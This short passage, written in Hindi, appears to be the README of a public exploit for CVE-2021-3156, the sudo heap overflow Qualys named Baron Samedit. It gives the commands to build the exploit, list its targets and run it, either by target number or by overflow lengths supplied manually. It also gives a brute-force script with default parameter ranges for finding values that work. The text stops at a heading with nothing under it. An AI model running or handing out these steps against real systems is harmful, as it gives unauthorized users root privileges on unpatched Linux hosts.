
यह CVE-2021-3156 sudo भेद्यता के लिए एक शोषण है (जिसे Qualys द्वारा Baron Samedit नाम दिया गया है)।
निर्माण:
$ make
लक्ष्य सूची:
$ ./sudo-hax-me-a-sandwich
चलाएँ:
$ ./sudo-hax-me-a-sandwich <target_number>
मैन्युअल मोड:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
सुनिश्चित करें कि आपके पास GNU parallel स्थापित है।
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
कुछ डिफ़ॉल्ट आज़माने के लिए:
$ ./brute.sh 90 120 50 70 150 300
यह सभी उपलब्ध कोर का उपभोग करेगा। नेटफ्लिक्स और ब्रूटफोर्स एक साथ करने की कोशिश न करें।
(समझदारी भरे) PR भेजें, मैं मर्ज कर सकता हूँ।
कुछ विचार: